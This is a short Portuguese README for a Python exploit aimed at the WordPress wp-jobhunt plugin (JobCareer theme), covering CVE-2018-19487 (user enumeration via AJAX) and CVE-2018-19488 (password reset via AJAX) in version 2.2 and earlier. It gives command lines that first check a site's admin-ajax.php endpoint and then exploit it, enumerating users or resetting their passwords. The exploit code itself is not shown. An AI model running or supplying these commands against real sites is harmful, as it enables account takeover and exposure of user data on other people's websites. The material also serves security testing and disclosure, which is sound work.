
CVE-2018-19487, CVE-2018-19488, exploit para o plugin wp-jobhunt do WordPress
CVE-2018-19487, CVE-2018-19488, exploit para o plugin wp-jobhunt do WordPress
O plugin wp-jobhunt é um plugin usado com o tema JobCareer:
https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 (veja o changelog no final)
Exploit em Python para CVE-2018-19487 (divulgação de informações de usuário via AJAX) e CVE-2018-19488 (redefinição de senha de usuário via AJAX) para a versão 2.2 e anteriores.
REQUISITOS:
COMO USAR:
Verificar se é vulnerável a enumeração de usuários:
python poc.py --checkenum https://wpsite/path/to/wp-admin/admin-ajax.php
Verificar se é vulnerável a redefinição de senha de usuário:
python poc.py --checkreset https://wpsite/path/to/wp-admin/admin-ajax.php
Explorar enumeração de usuários:
python poc.py --enum https://wpsite/path/to/wp-admin/admin-ajax.php
Explorar redefinição de senha de usuário:
python poc.py --reset https://wpsite/path/to/wp-admin/admin-ajax.php